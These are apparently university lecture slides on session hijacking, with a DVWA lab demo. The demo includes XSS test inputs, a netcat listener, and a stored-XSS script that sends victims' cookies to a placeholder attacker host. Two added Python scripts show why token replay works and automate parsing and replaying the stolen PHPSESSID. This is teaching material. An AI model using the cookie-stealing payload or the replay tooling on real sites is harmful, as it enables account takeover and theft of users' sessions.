Session Hijacking
NAVY Research Group, Department of Computer Science, Faculty of Electrical Engineering and Computer Science, VŠB-TUO, 17. listopadu 15, 708 33 Ostrava-Poruba, Czech Republic
navy.cs.vsb.cz
HTTP protocol
The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. HTTP has been in use by the World-Wide Web global information initiative since 1990.
HTTP protocol
Server response:

HTTP/1.1 200 OK
Date: Mon, 27 Jul 2009 12:28:53 GMT
Server: Apache
Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
ETag: "34aa387-d-1568eb00"
Accept-Ranges: bytes
Content-Length: 51
Vary: Accept-Encoding
Content-Type: text/plain

Hello World! My payload includes a trailing CRLF.

(The empty line separates the headers from the body. Content-Length counts the body bytes only: the 49 visible characters plus the trailing CRLF.)
Session
A session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and a user (a login session). A session is set up or established at a certain point in time and torn down at some later point.
– An established communication session may involve more than one message in each direction.
A session is typically stateful, meaning that at least one of the communicating parties needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, which consists of independent requests with responses.
Session
An HTTP session is a sequence of network request-response transactions.
– An HTTP client initiates a request by establishing a Transmission Control Protocol (TCP) connection to a particular port on a server (typically port 80).
– An HTTP server listening on that port waits for a client's request message.
– Upon receiving the request, the server sends back a status line, such as "HTTP/1.1 200 OK", and a message of its own.
– The body of this message is typically the requested resource, although an error message or other information may also be returned.
Session
HTTP is a stateless protocol. An HTTP server therefore needs sessions to retain information or status about each user across multiple requests. Web applications implement state, or server-side sessions, using for instance HTTP cookies, hidden fields within web forms, or parameters encoded in the URL.
Session hijacking
Session hijacking is when an attacker takes over a session between two systems (machines). The attack exploits the web session control mechanism, which is normally managed through a session token.
– Because HTTP communication uses many different TCP connections, the web server needs a method to recognise every user's connections.
– The most common method depends on a token that the web server sends to the client browser after successful client authentication.
– A session token is normally a string of variable width and can be carried in different ways: in the URL, in the header of the HTTP request as a cookie, in other parts of the HTTP request header, or in the body of the HTTP request.
The session hijacking attack compromises the session token by stealing or predicting a valid session token and using it to gain unauthorised access to the web server.
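To make the point concrete, here is an added example (not from the slides) of a toy session layer on top of stateless HTTP. It is a hypothetical handler, not DVWA's code: the paths /login.php and /index.php, the cookie name PHPSESSID and the user smithy/password are taken from the demo that follows, the token format is an assumption. The server binds a login to a random token and afterwards recognises the user only by that token, so a second client presenting the same token is treated as the victim.

```python
import secrets
from http.cookies import SimpleCookie

SESSION_COOKIE = "PHPSESSID"      # cookie name used in the DVWA demo (this server is a toy, not PHP)
USERS = {"smithy": "password"}    # constructed credentials, mirroring the demo account
sessions = {}                     # token -> username: the state that stateless HTTP itself lacks


def new_token():
    """128 random bits from the OS CSPRNG. A guessable token could be predicted instead of stolen."""
    return secrets.token_hex(16)


def session_user(headers):
    """Return the user bound to the session token in the Cookie header, or None."""
    raw = headers.get("Cookie")
    if not raw:
        return None
    jar = SimpleCookie()
    jar.load(raw)
    morsel = jar.get(SESSION_COOKIE)
    return sessions.get(morsel.value) if morsel else None


def handle(method, path, headers, form=None):
    """Minimal request handler returning (status, response headers, body)."""
    form = form or {}
    if method == "POST" and path == "/login.php":
        if USERS.get(form.get("username")) == form.get("password"):
            token = new_token()
            sessions[token] = form["username"]
            # From here on the token is the only thing tying a request to this login.
            # No HttpOnly flag, as in the demo: document.cookie can read it. HttpOnly would
            # stop that read in the browser, but not the server-side replay below.
            return 302, {"Set-Cookie": f"{SESSION_COOKIE}={token}; Path=/",
                         "Location": "/index.php"}, ""
        return 200, {}, "Login failed"
    if path == "/index.php":
        user = session_user(headers)
        if user is None:
            return 302, {"Location": "/login.php"}, ""
        return 200, {}, f"Welcome, {user}"
    return 404, {}, "Not found"


def hijack_demo():
    """Victim logs in; attacker replays the token from another client and is treated as the victim."""
    status, hdrs, _ = handle("POST", "/login.php", {},
                             {"username": "smithy", "password": "password"})
    assert status == 302
    token = SimpleCookie(hdrs["Set-Cookie"])[SESSION_COOKIE].value  # what document.cookie would leak
    # Attacker's request: different client, no login of its own, just the stolen token.
    attacker_headers = {"User-Agent": "curl/8.0", "Cookie": f"{SESSION_COOKIE}={token}"}
    return handle("GET", "/index.php", attacker_headers)[2]


def anonymous_demo():
    """Same page without a token: the server has nothing to recognise the client by."""
    return handle("GET", "/index.php", {"User-Agent": "curl/8.0"})[0]


if __name__ == "__main__":
    print(anonymous_demo())   # 302, bounced to the login page
    print(hijack_demo())      # Welcome, smithy
```

Nothing in the attacker's request identifies it as coming from a different machine or browser; the server has only the token to go on, which is exactly what the attack on the following slides steals.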
Session hijacking – Man in the middle
Session hijacking – XSS (Cross Site Scripting)
Demo
1. Attacker logs into the target web application as a common user.
   http://127.0.0.1/dvwa/login.php
   User name: smithy
   Password: password
2. Test the text input for an XSS vulnerability. Type in:
   <script>alert('XSS!');</script>
   <script>alert(document.cookie);</script>
Demo
Attacker logs in to Kali Linux
Username: root
Password: toor
Determine the attacker's IP address:
root@kali:~# ifconfig eth0
Demo
Use the Netcat utility to listen for incoming HTTP requests (TCP port 80):
root@kali:~# netcat -lvp 80
  -l       listen mode, for inbound connects
  -v       verbose (use twice to be more verbose)
  -p port  local port number
Demo
In DVWA navigate to the XSS Stored (Guest Book) section.
– This section represents a guest book; records are stored in the DB.
Add a new record containing your malicious script, which will steal the victim's session ID.
– HOST is your attacker PC's IP address.
Demo
<script>
var img = new Image();
img.src = "http://HOST/MyNetcatServiceListener?cookie=" + document.cookie;
</script>
Demo
Now whoever visits the guest book executes your XSS code and sends their cookies, including PHPSESSID, to the attacker's PC. The request shows up in the netcat window as a GET whose query string carries the cookie; netcat never answers, so the victim's browser only sees a broken image. Note that document.cookie exposes only cookies set without the HttpOnly flag; PHP does not set that flag on PHPSESSID unless session.cookie_httponly is enabled.
Demo
Use the hijacked cookie to bypass authentication. On the attacker's PC, open a browser and navigate to the DVWA web page.
Demo
Open the Tamper Data plugin and start tampering. Fill in a non-existent user name and password so the browser sends a login request carrying its own session cookie. In Tamper Data, edit the PHPSESSID value to the value received from the hijacked cookie; the server then treats the attacker's browser as the victim's logged-in session.
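The last two steps of the demo can be scripted instead of done by hand in Tamper Data. The following is an added example, not part of the original slides or of DVWA: it parses the request line that netcat printed, recovers the exfiltrated cookies, and builds the replay request with the stolen PHPSESSID. The captured request, the attacker IP 192.168.56.101 and the PHPSESSID value are constructed for the example; the path /dvwa/index.php is assumed to be a page that requires a login.

```python
import http.client
from urllib.parse import urlsplit, unquote

# Constructed sample of what the netcat listener prints when the victim's browser loads the
# injected image. The attacker IP and the PHPSESSID value are made up for this example.
CAPTURED_REQUEST = (
    "GET /MyNetcatServiceListener?cookie=security=low;%20PHPSESSID=q6hvu4t1jqdvf7hvf0a3jj9ct5 HTTP/1.1\r\n"
    "Host: 192.168.56.101\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: image/webp,*/*\r\n"
    "Referer: http://127.0.0.1/dvwa/vulnerabilities/xss_s/\r\n"
    "Connection: keep-alive\r\n\r\n"
)


def extract_cookies(captured):
    """Pull the exfiltrated cookies out of the request line that netcat showed.

    The payload appends document.cookie verbatim, so '=' and ';' arrive unencoded and
    only the space is percent-encoded; therefore split each query pair on its first '='.
    """
    request_line = captured.split("\r\n", 1)[0]
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("unexpected method " + method)
    cookies = {}
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key != "cookie":
            continue
        for item in unquote(value).split(";"):
            name, sep, val = item.strip().partition("=")
            if sep:
                cookies[name] = val
    return cookies


def cookie_header(cookies):
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


def build_replay(host, path, cookies):
    """Raw request equivalent to what the browser sends after the PHPSESSID edit in Tamper Data."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_header(cookies)}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def replay(host, port, path, cookies):
    """Send the hijacked session to the target (needs a reachable DVWA; not run by default)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path, headers={"Cookie": cookie_header(cookies)})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    # A redirect to login.php means the token was not accepted (expired, or the victim logged out).
    return resp.status, resp.getheader("Location"), body


if __name__ == "__main__":
    stolen = extract_cookies(CAPTURED_REQUEST)
    print(build_replay("127.0.0.1", "/dvwa/index.php", stolen).decode())
```

Run it as a script to see the replay request; call replay("127.0.0.1", 80, "/dvwa/index.php", stolen) against a running DVWA to actually use the stolen session. The security=low cookie is carried along because DVWA's browser would also send it; only PHPSESSID matters for authentication.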